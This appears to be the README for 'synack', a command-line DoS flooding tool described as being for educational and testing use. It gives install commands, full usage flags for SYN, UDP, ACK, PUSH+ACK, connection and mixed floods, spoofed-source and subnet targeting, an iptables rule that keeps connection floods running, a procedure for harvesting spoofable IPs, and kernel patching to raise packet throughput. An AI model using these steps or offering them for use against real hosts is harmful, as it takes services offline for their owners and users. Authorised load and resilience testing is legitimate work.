Tool created for testing DDOS/DOS attacks. Supports SYN, UDP, TCP connection, ACK, PUSH+ACK and mixed floods. Created FOR EDUCATIONAL AND TESTING purposes only.
edubart - github.com/edubart
$ git clone git://github.com/edubart/synack.git $ make $ sudo make install
TCP Ping
Ping a TCP port by seding simple SYN packet, option created
just to see the target responsiveness.
Connection flood
Flood TCP services with the 3-way TCP handshake causing
massive amount of connections on the host, exhausting it's resources
and then preventing new connections.
NOTE: If you use this attack, you MUST add the following iptables
rule to prevent your kernel aborting the attack, otherwise your
kernel will reject all established connections on the target:
iptables -I OUTPUT -p tcp --tcp-flags ALL RST -j DROP
NOTE: Spoofing can't be used with this attack.
NOTE: If you are behind a shared connection with a router as gateway,
make sure that the router can handle massive amount of connections,
usually home user routers can't, so you might wan't to connect directly
if possible. By directly I mean assigning your public IP directly to
your interface.
SYN, UDP floods
Well known flood types
ACK, PA, Mixed S/A/PA/FA and Mixed A/PA/FA floods
Uncommon flood types created for testing purposes
NOTE:
PA = TCP with flags PUSH+ACK set
FA = TCP with flags FIN+ACK set
S = TCP with flag SYN set
A = TCP with flag ACK set
synack -i <interface> -h <host> [action] [options]
Actions:
-P - TCP ping (default action)
-C - Connection flood
-S - SYN flood
-A - ACK flood
-X - SYN+ACK flood
-D - PA flood
-M - Mixed S/A/PA/FA flood
-N - Mixed A/PA/FA flood
-U - UDP flood
-O - Monitor interface traffic
General options:
-i [interface] - Which interface to do the action (required)
-h [host,host2] - Target hosts separated by comma, accepts 'host:port' syntax too (required)
-H [targets file] - Targets in a file where each line is in ip:port format
-n [subnet] - Attack subnet, use formats like 192.168.0.0/16
-p [port] - Target port (default: random)
-t [time] - Run time in seconds (default: infinite)
-u [interval] - Sleep interval in microseconds (default: 10000)
-j [pps] - Calculates a sleep interval for desired packets per second output (accurate with multiple threads)
-b [bytes] - Additional random bytes to send as data (default: 0)
-m [threads] - Number of send threads (default: 1)
-s [ip] - Custom source ip, you may set to 'random' (default: interface ip)
-d [binary file] - Send binary file as data
-z [page] [host] - Send simple HTTP 1.1 request as data
-f [text file] - Read a list of IPs from a text file for spoofing
-o - Disable tcp options on SYN packets
-q - Quiet, don't print statistics output
-x - Drop established connections when receive ACK packets
-y [delay] - Drop established connections after delay
-k [smac] [dmac] - Use rawsendto kernel patch to send massive kpps
-c [count] - Max number of packets to send
-w - Stop after one packet was sent to all targets
--help - Print this help
How to generate spoof ips list
# on target machine
iptables -I INPUT -p tcp --dport 9999 -j DROP
tcpdump -i eth0 tcp port 9999 -n -t -c 1100000 > spoofsniff
cat spoofsniff | awk '{print $2}' | sed 's/^\(.*\)\..*$/\1/' | sort | uniq > spoofips
# on source machine
synack -i eth0 -s random -h target -A -p 9999 -m 10 -j 1000
How to speed up throughput to get more pps (packets per second)
# enable XPS echo f > /sys/class/net/eth1/queues/tx-0/xps_cpus # increase txqueuelen ifconfig eth1 txqueuelen 100000 # increase interface tx ring buffer ethtool -G eth1 tx 4096 # enable 1000mbps full duplex ethtool -s eth1 speed 1000 duplex full # patch kernel with rawsendto to enable option -k for even more throughput # in the menuconfig make sure you do the following: # * disable optimize for size # * select you cpu architeture # * disable preemption # * change timer clock to 100Hz, sudo apt-get install build-essential kernel-package wget http://www.kernel.org/pub/linux/kernel/v3.0/linux-3.2.7.tar.bz2 tar xjf linux-3.2.7.tar.bz2 cd linux-3.2.7 cp /boot/config-2.6.32-5-amd64 .config patch -p1 < rawsendto.patch make menuconfig fakeroot make-kpkg clean fakeroot make-kpkg --append-to-version="-rawsendto" --initrd --us --uc -j4 kernel_image kernel_headers cd .. sudo dpkg -i linux-image-3.2.7-rawsendto_3.2.7-rawsendto-10.00.Custom_amd64.deb sudo reboot